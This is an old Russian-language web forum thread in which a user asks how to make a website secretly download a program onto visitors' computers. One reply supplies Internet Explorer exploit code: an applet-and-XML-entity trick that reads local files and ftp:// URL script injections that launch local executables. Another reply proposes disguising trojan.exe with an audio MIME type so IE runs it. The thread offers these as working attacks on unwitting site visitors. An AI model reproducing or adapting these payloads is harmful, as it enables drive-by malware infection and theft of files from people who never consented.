Легенда:
 новое сообщение
 закрытая нитка
 новое сообщение
 в закрытой нитке
 старое сообщение
|
- Напоминаю, что масса вопросов по функционированию форума снимается после прочтения его описания.
- Новичкам также крайне полезно ознакомиться с данным документом.
Internet Explorer 04.09.02 23:47
Автор: litl Статус: Незарегистрированный пользователь
|
Привет всем.
Возможно ли сделать такую вещь: Когда посетитель заходит на сайт ему автоматически без его ведома скачивается программа, конечно же он не должен видеть как это происходит.
Или это просто миф.
|
|
Держи реализацию для IE 06.09.02 13:41
Автор: FreeHermit Статус: Незарегистрированный пользователь
|
---[ Чтение любого файла (IE)
Создай на диске C: файл test.txt
<html>
<head>
<base href="file:///C:/">
</head>
<body>
<applet code="com.ms.xml.dso.XMLDSO.class" width="0" height="0" id="xmldso" MAYSCRIPT="true">
<?xml version="1.0"?>
<!DOCTYPE file [
<!ELEMENT file (#PCDATA) >
<!ENTITY contents SYSTEM "file:///C:/test.txt">
]>
<file>
&contents;
</file>
</applet>
<script language="javascript">
setTimeout("showIt()",2000);
function showIt() {
var jelmer = xmldso.getDocument();
alert(jelmer.Text);
}
</script>
</body>
</html>
---[ Запуск любых программ и выполнение команд
Вводить в строчке URL
-[ 9x:
ftp://"><script>setTimeout(function(){document.body.innerHTML='<object%20classid="clsid:11111111-1111-1111-1111-111111111111"%20%20codebase="file://c:/windows/notepad.exe"></object>'},%20200);</script>/
-[ NT/2000/XP:
ftp://"><script>setTimeout(function(){document.body.innerHTML='<object%20classid="clsid:11111111-1111-1111-1111-111111111111"%20%20codebase="file://c:/winnt/notepad.exe"></object>'},%20200);</script>/
|
|
Internet Explorer 05.09.02 00:46
Автор: Tamas Статус: Member
|
> Привет всем.
> Возможно ли сделать такую вещь: Когда посетитель заходит на
> сайт ему автоматически без его ведома скачивается
> программа, конечно же он не должен видеть как это
> происходит.
> Или это просто миф.
По идеи да что самое интересное
хотя сам не пробывал !!!
вобшем мысля такая
IE при скачки фаилов проверяет тип фаила по
HTTP заголовку а не по расширению
так что надо просто при передачи
фаилов в заголовке указать тип например audio/x-wav
а передавать напимер trojan.exe что привидёт
ктаму что IE подумает что это wav и отправит его на
выполнение в систему
для реализации это иддеи тибе понадобтся
собствиный HTTP сервер как минимум.
|
| |
Internet Explorer 05.09.02 09:49
Автор: litl Статус: Незарегистрированный пользователь
|
> По идеи да что самое интересное
> хотя сам не пробывал !!!
> вобшем мысля такая
> IE при скачки фаилов проверяет тип фаила по
> HTTP заголовку а не по расширению
> так что надо просто при передачи
> фаилов в заголовке указать тип например audio/x-wav
> а передавать напимер trojan.exe что привидёт
> ктаму что IE подумает что это wav и отправит его на
> выполнение в систему
> для реализации это иддеи тибе понадобтся
> собствиный HTTP сервер как минимум.
Да это идея но надо я так понял скрипт писать или ещё что то в этом роде.
А как ти начём это сделать я незнаю. Не подскажешь.
|
|
|
подробно о проекте
Анализ криптографических сетевых...
